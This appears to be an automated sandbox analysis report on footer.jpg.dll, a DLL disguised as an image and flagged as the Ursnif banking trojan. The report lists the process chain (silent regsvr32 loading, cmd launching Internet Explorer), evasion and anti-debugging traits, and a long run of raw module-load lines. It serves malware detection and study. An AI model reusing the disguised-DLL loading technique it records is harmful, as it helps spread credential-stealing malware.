Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll

Source: footer.jpg.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal76.troj.winDLL@13/138@10/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_048782EB CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9561B4B9-6B6D-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF17DD12A14CEE3B99.TMP

Jump to behavior

Source: footer.jpg.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: footer.jpg.dll

ReversingLabs: Detection: 12%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\footer.jpg.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\footer.jpg.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82962 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82966 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\footer.jpg.dll
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82962 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82966 /prefetch:2

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Data Obfuscation:

Source: footer.jpg.dll

Static PE information: real checksum: 0x47a6b should be: 0x51c2b

Source: footer.jpg.dll	Static PE information: section name: .scalma
Source: footer.jpg.dll	Static PE information: section name: .submont
Source: footer.jpg.dll	Static PE information: section name: .enrive
Source: footer.jpg.dll	Static PE information: section name: .photopo
Source: footer.jpg.dll	Static PE information: section name: .circumz
Source: footer.jpg.dll	Static PE information: section name: .cledoni
Source: footer.jpg.dll	Static PE information: section name: .anamorp
Source: footer.jpg.dll	Static PE information: section name: .ac
Source: footer.jpg.dll	Static PE information: section name: .zelania
Source: footer.jpg.dll	Static PE information: section name: .accusat

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\footer.jpg.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00402040 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00402093 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0487B0BB push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0487AD00 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF009C push dword ptr [ebp-000000D8h]; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF009C push dword ptr [ebp-000000E0h]; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF009C push dword ptr [esp+10h]; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF0397 push dword ptr [esp+0Ch]; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF0397 push dword ptr [esp+10h]; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF0066 push dword ptr [ebp-000000D8h]; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF0005 push dword ptr [ebp-000000D8h]; ret

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4164, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7048	Thread sleep count: 32 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7048	Thread sleep count: 34 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7048	Thread sleep count: 256 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7048	Thread sleep time: -128000s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe

Anti Debugging:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF03F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF009C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF0397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00EF0469 mov eax, dword ptr fs:[00000030h]

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe

Source: regsvr32.exe, 00000001.00000002.1037220987.0000000003390000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000001.00000002.1037220987.0000000003390000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000001.00000002.1037220987.0000000003390000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000001.00000002.1037220987.0000000003390000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_0487A446 cpuid

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_004012F4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_0487A446 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00401146 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4164, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, type: MEMORY
